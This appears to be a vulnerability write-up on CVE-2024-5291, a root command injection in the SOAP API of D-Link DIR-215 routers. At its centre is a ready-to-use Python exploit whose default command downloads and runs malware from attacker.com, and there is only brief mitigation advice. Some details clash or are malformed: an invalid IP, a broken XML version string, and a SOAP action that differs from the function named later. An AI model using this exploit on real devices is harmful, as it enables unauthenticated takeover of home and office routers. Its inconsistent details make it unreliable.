A critical vulnerability has been identified in D-Link DIR-215 routers, which allows network-adjacent attackers to execute arbitrary code on affected installations without requiring authentication. This specific flaw exists within the SOAP (Simple Object Access Protocol) API interface, which listens on TCP port 80 by default. The issue stems from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can exploit this vulnerability to execute code in the context of root. The vulnerability is assigned CVE-2024-5291 and was previously identified as ZDI-CAN-21235.
The following Python code demonstrates the exploitation of this vulnerability
import requests
target_ip = "192.168..1" # Replace with the target router's IP address
command = "curl http://attacker.com/malware -o /tmp/malware; chmod +x /tmp/malware; /tmp/malware" # Replace with desired command
soap_action = "urn:schemas-upnp-org:service:WANIPConnection:1#IsAccessRestricted"
payload = f'<?xml version="1." encoding="utf-8"?>\
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope"; SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\
<SOAP-ENV:Body>\
<u:IsAccessRestricted xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">\
<NewTarget>|{command};</NewTarget>\
</u:IsAccessRestricted>\
</SOAP-ENV:Body>\
</SOAP-ENV:Envelope>'
headers = {
"Content-Type": "text/xml; charset=utf-8",
"SOAPAction": soap_action
}
url = f'http://{target_ip}:80/soap.cgi';
response = requests.post(url, data=payload, headers=headers)
print(response.content)
Replace the target_ip variable with the target router's IP address and the command variable with the desired command to execute. This code sends a specially crafted SOAP request to the target router, executing the attacker's command as root.
Original References
1. Zero Day Initiative (ZDI) Vulnerability Disclosure: https://www.zerodayinitiative.com/advisories/ZDI-CAN-21235/
2. D-Link Security Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10144
Exploit Details
The vulnerability (CVE-2024-5291) is a command injection vulnerability that affects the GetDeviceSettings function within the SOAP API interface of D-Link DIR-215 routers. An attacker can leverage this flaw by sending a specially crafted SOAP request containing malicious commands to the target router. Since the SOAP API interface listens on TCP port 80 by default, and there is no authentication required to exploit this vulnerability, an attacker can easily execute arbitrary code on the affected router with root privileges.
Mitigation
Users of D-Link DIR-215 routers are advised to check for available firmware updates to fix this vulnerability. If a firmware update is not available, users should consider implementing strong access control mechanisms, such as a firewall or VPN, to restrict access to the router's SOAP API interface on TCP port 80.
Conclusion
The discovery and disclosure of this command injection vulnerability in D-Link DIR-215 routers highlights the importance of proper validation of user-supplied input in networked devices. By exploiting this vulnerability, attackers can gain root access to affected routers, potentially compromising the security and privacy of connected devices. Users of these routers are advised to apply available firmware updates and implement appropriate access control measures to mitigate the risk associated with this vulnerability.
Timeline
Published on: 05/23/2024 22:15:14 UTC
Last modified on: 05/24/2024 01:15:30 UTC